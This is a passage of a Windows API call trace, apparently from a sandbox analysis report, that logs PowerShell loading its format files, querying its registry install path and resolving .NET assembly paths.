lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0068.037] SetErrorMode (uMode=0x1) returned 0x1 [0068.037] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.037] CoTaskMemFree (pv=0x230110) [0068.040] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.040] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.040] CoTaskMemFree (pv=0x230110) [0068.040] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.040] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.040] CoTaskMemFree (pv=0x230110) [0068.040] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.040] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.040] CoTaskMemFree (pv=0x230110) [0068.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.041] SetErrorMode (uMode=0x1) returned 0x1 [0068.041] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.041] GetFileType (hFile=0x314) returned 0x1 [0068.041] SetErrorMode (uMode=0x1) returned 0x1 [0068.041] GetFileType (hFile=0x314) returned 0x1 [0068.041] ReadFile (in: hFile=0x314, lpBuffer=0x33ddcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ddcf0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.043] ReadFile (in: hFile=0x314, lpBuffer=0x33ddcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ddcf0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.043] ReadFile (in: hFile=0x314, lpBuffer=0x33ddcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ddcf0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.043] ReadFile (in: hFile=0x314, lpBuffer=0x33ddcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ddcf0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.044] ReadFile (in: hFile=0x314, lpBuffer=0x33ddcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ddcf0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.044] ReadFile (in: hFile=0x314, lpBuffer=0x33ddcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ddcf0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.044] ReadFile (in: hFile=0x314, lpBuffer=0x33ddcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ddcf0*, lpNumberOfBytesRead=0x12cff8*=0x9e2, lpOverlapped=0x0) returned 1 [0068.045] ReadFile (in: hFile=0x314, lpBuffer=0x33dd23a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33dd23a*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.045] ReadFile (in: hFile=0x314, lpBuffer=0x33ddcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x33ddcf0*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.045] SetErrorMode (uMode=0x1) returned 0x1 [0068.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0068.046] SetErrorMode (uMode=0x1) returned 0x1 [0068.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.046] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.046] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.046] CoTaskMemAlloc (cb=0x5a) returned 0x23eb10 [0068.046] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eb10, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.046] CoTaskMemFree (pv=0x23eb10) [0068.046] RegCloseKey (hKey=0x314) returned 0x0 [0068.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.049] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x4178a30d, Data2=0x8957, Data3=0x40ca, Data4=([0]=0xa9, [1]=0x5, [2]=0x7f, [3]=0x2d, [4]=0x9e, [5]=0x3f, [6]=0x4e, [7]=0xa9))) returned 0x0 [0068.050] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xf3f916b4, Data2=0xb2b2, Data3=0x4038, Data4=([0]=0xa7, [1]=0x5d, [2]=0xe, [3]=0x72, [4]=0x20, [5]=0x3f, [6]=0x12, [7]=0xda))) returned 0x0 [0068.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0068.051] SetErrorMode (uMode=0x1) returned 0x1 [0068.051] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.051] GetFileType (hFile=0x314) returned 0x1 [0068.052] SetErrorMode (uMode=0x1) returned 0x1 [0068.052] GetFileType (hFile=0x314) returned 0x1 [0068.052] ReadFile (in: hFile=0x314, lpBuffer=0x3408858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3408858*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.053] ReadFile (in: hFile=0x314, lpBuffer=0x3408858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3408858*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.053] ReadFile (in: hFile=0x314, lpBuffer=0x3408858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3408858*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.054] ReadFile (in: hFile=0x314, lpBuffer=0x3408858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3408858*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.054] ReadFile (in: hFile=0x314, lpBuffer=0x3408858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3408858*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.055] ReadFile (in: hFile=0x314, lpBuffer=0x3408858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3408858*, lpNumberOfBytesRead=0x12cff8*=0xfb2, lpOverlapped=0x0) returned 1 [0068.055] ReadFile (in: hFile=0x314, lpBuffer=0x3407f72, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3407f72*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.055] ReadFile (in: hFile=0x314, lpBuffer=0x3408858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3408858*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0068.056] SetErrorMode (uMode=0x1) returned 0x1 [0068.056] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0068.056] SetErrorMode (uMode=0x1) returned 0x1 [0068.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0068.056] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.056] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.056] CoTaskMemAlloc (cb=0x5a) returned 0x23eb80 [0068.056] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eb80, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.056] CoTaskMemFree (pv=0x23eb80) [0068.056] RegCloseKey (hKey=0x314) returned 0x0 [0068.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0068.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0068.057] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xef5822d9, Data2=0xe12c, Data3=0x4b4e, Data4=([0]=0x9d, [1]=0x8d, [2]=0xf8, [3]=0x6e, [4]=0x3a, [5]=0xeb, [6]=0x1a, [7]=0x44))) returned 0x0 [0068.058] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x40ba2f3b, Data2=0x52fa, Data3=0x4d65, Data4=([0]=0x87, [1]=0xac, [2]=0x51, [3]=0x70, [4]=0x50, [5]=0x2f, [6]=0x31, [7]=0xb6))) returned 0x0 [0068.058] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x944de636, Data2=0x6222, Data3=0x42e5, Data4=([0]=0xb2, [1]=0x49, [2]=0xa, [3]=0xbc, [4]=0xfb, [5]=0x7, [6]=0xfd, [7]=0xe6))) returned 0x0 [0068.058] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x98bb5e5b, Data2=0xf5fb, Data3=0x428f, Data4=([0]=0x9e, [1]=0xb, [2]=0xd8, [3]=0x14, [4]=0x36, [5]=0x3d, [6]=0x2f, [7]=0xaa))) returned 0x0 [0068.058] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x59a57c6e, Data2=0x8745, Data3=0x48cd, Data4=([0]=0xaa, [1]=0x57, [2]=0x56, [3]=0x3e, [4]=0x32, [5]=0x6d, [6]=0xd4, [7]=0xa8))) returned 0x0 [0068.059] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xc7b33da1, Data2=0xb718, Data3=0x4a35, Data4=([0]=0xa4, [1]=0xca, [2]=0x3c, [3]=0xd7, [4]=0xb1, [5]=0x38, [6]=0x92, [7]=0xd7))) returned 0x0 [0068.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.059] SetErrorMode (uMode=0x1) returned 0x1 [0068.059] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.059] GetFileType (hFile=0x314) returned 0x1 [0068.059] SetErrorMode (uMode=0x1) returned 0x1 [0068.059] GetFileType (hFile=0x314) returned 0x1 [0068.059] ReadFile (in: hFile=0x314, lpBuffer=0x34545b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x34545b8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.060] ReadFile (in: hFile=0x314, lpBuffer=0x34545b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x34545b8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.061] ReadFile (in: hFile=0x314, lpBuffer=0x34545b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x34545b8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.062] ReadFile (in: hFile=0x314, lpBuffer=0x34545b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x34545b8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.062] ReadFile (in: hFile=0x314, lpBuffer=0x34545b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x34545b8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.062] ReadFile (in: hFile=0x314, lpBuffer=0x34545b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x34545b8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.063] ReadFile (in: hFile=0x314, lpBuffer=0x34545b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x34545b8*, lpNumberOfBytesRead=0x12cff8*=0xaca, lpOverlapped=0x0) returned 1 [0068.063] ReadFile (in: hFile=0x314, lpBuffer=0x3453bea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3453bea*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.063] ReadFile (in: hFile=0x314, lpBuffer=0x34545b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x34545b8*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.063] SetErrorMode (uMode=0x1) returned 0x1 [0068.063] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0068.063] SetErrorMode (uMode=0x1) returned 0x1 [0068.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.063] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.064] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.064] CoTaskMemAlloc (cb=0x5a) returned 0x23eb80 [0068.064] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eb80, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.064] CoTaskMemFree (pv=0x23eb80) [0068.064] RegCloseKey (hKey=0x314) returned 0x0 [0068.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0068.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0068.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0068.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0068.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0068.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0068.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0068.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0068.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0068.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0068.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: 